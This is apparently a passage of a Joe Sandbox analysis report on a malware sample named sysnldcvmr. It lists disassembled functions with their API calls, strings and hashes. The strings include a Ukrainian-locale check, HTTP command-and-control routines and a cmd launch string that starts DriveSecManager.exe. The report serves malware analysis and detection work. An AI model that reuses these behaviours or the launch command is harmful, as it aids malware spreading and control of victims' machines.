wsprintfW.USER32 ref: 00406595
FindFirstFileW.KERNEL32(?,?), ref: 004065AC
lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
wsprintfW.USER32 ref: 0040660A
wsprintfW.USER32 ref: 0040662A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
FindClose.KERNEL32(000000FF), ref: 0040668F
RemoveDirectoryW.KERNEL32(?), ref: 00406699

Strings

ok@, xrefs: 0040657B, 0040661A, 0040657E, 0040661D
%s\%s, xrefs: 0040661E
%s\%s, xrefs: 004065FE
%s\*, xrefs: 00406589

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*$ok@
API String ID: 92872011-32713442
Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58

Function 0040F0B1 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 0040F162

Strings

oA, xrefs: 0040F181
oA, xrefs: 0040F263
oA, xrefs: 0040F2C0

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: oA$ oA$ oA
API String ID: 2850889275-3725432611
Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C

Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
strcmp.NTDLL ref: 0040E752

Strings

UKR, xrefs: 0040E749

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

ilci, xrefs: 004019E1
PCOI, xrefs: 0040198A

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99

Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040E518
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
InternetCloseHandle.WININET(00000000), ref: 0040E701
InternetCloseHandle.WININET(00000000), ref: 0040E70E
InternetCloseHandle.WININET(00000000), ref: 0040E71B

Strings

POST, xrefs: 0040E5DE
<, xrefs: 0040E520
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040E576

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54

Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

ilci, xrefs: 00401630
.ou, xrefs: 004016FF
PCOI, xrefs: 0040160D

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci$.ou
API String ID: 2403999931-3537421359
Opcode ID: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
Opcode Fuzzy Hash: 002568448c63d0a3f212006a3792e32a6b926d0b6d38af1dbe87adf1abbded14
Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98

Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040DBE8
InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
InternetCloseHandle.WININET(00000000), ref: 0040DDB7
InternetCloseHandle.WININET(00000000), ref: 0040DDC4
InternetCloseHandle.WININET(00000000), ref: 0040DDD1

Strings

<, xrefs: 0040DBF0
GET, xrefs: 0040DCAB

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54

Function 00406060 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040CBEC,?), ref: 0040606F
memcpy.NTDLL(?,00000000,00000100), ref: 00406101
CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
CloseHandle.KERNEL32(000000FF), ref: 0040629D
LeaveCriticalSection.KERNEL32(00415E30,?,?,?,?,?,?,0040B90E,00000000,0040CBEC,?), ref: 004062A8

Strings

C:\Users\user\tbtcmds.dat, xrefs: 00406220
.ou, xrefs: 0040629D

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID: C:\Users\user\tbtcmds.dat$.ou
API String ID: 1457358591-2669820434
Opcode ID: 83d86ba9bf43733d3f94aa7f41c6e355e6d1358f9d97233fed313ad882293440
Instruction ID: bb102638da67a563b53aa46b2a5b6ce2f3b38349fb156310049a7a66f3822ae6
Opcode Fuzzy Hash: 83d86ba9bf43733d3f94aa7f41c6e355e6d1358f9d97233fed313ad882293440
Instruction Fuzzy Hash: 1D71DEB5E002099BCB04DF94D981FEFB7B1BB88304F14816DE505BB382D779A951CBA5

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
Instruction ID: a48952fab395babe4cfd63b323185ec8fb23c48b53ef468cda2161a158f186bf
Opcode Fuzzy Hash: 455a785a1462a168860a16a7b96cb30f84d4113cb7820f003e1e275d5cc4599c
Instruction Fuzzy Hash: 7A51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96

Function 0040E240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
SysFreeString.OLEAUT32(00000000), ref: 0040E35F
SysFreeString.OLEAUT32(00000000), ref: 0040E377

Strings

deviceType, xrefs: 0040E306
device, xrefs: 0040E2F3

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
Instruction ID: d9bf12878483276118e69e011fb1eaaed98ea0d23904e8601ea4f62f39df24ad
Opcode Fuzzy Hash: 1b177aca5382db3f1c66da14849aee522d75b48b0e19709232399be15e741896
Instruction Fuzzy Hash: C4412D74A0020ADFCB04DF95C884FAFBBB5BF49304F108969E915A7390D778AD81CB95

Function 0040E0E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
SysFreeString.OLEAUT32(00000000), ref: 0040E217

Strings

serviceType, xrefs: 0040E1A6
service, xrefs: 0040E193

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
Instruction ID: 8be64e74ab35422ce5b67f5b255e261f781d2e412f5a45cda6e842047ddde31e
Opcode Fuzzy Hash: 99a16f71be16d8847cb7d1021c7ddccdc4dc2b0592ef80971ad883e08ff36aa9
Instruction Fuzzy Hash: BB41E874A0020ADFCB14CF99C884BAFB7B9BF48304F1085ADE515A7390D778AA81CF95

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
Opcode Fuzzy Hash: 84994d564abaa1f0b77106ae7f883709b87c3a35ff6a80d81c042e6f665fff2e
Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9

Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
SysFreeString.OLEAUT32(00000000), ref: 0040E35F
SysFreeString.OLEAUT32(00000000), ref: 0040E377

Strings

deviceType, xrefs: 0040E306
device, xrefs: 0040E2F3

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95

Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
SysFreeString.OLEAUT32(00000000), ref: 0040E217

Strings

serviceType, xrefs: 0040E1A6
service, xrefs: 0040E193

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95

Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00407376
srand.MSVCRT ref: 0040737D
rand.MSVCRT ref: 00407385
Sleep.KERNEL32 ref: 00407396
StrChrA.SHLWAPI(00000000,0000007C), ref: 004073BC
Sleep.KERNEL32(000003E8), ref: 004073ED

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleep$CountTickrandsrand
String ID:
API String ID: 3488799664-0
Opcode ID: 9b4aaea4de293e7613797dc8819211a47175aa23b786492405d8e261baea7983
Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
Opcode Fuzzy Hash: 9b4aaea4de293e7613797dc8819211a47175aa23b786492405d8e261baea7983
Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56

Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408EBD
_aullshr.NTDLL ref: 00408ECE
_allshl.NTDLL ref: 00408EF0
_aullshr.NTDLL ref: 00408F0C
_allshl.NTDLL ref: 00408F2E
_aullshr.NTDLL ref: 00408F4A

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8

Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040646B
CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
wsprintfW.USER32 ref: 004064B6

Strings

%comspec%, xrefs: 004064BF
/c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

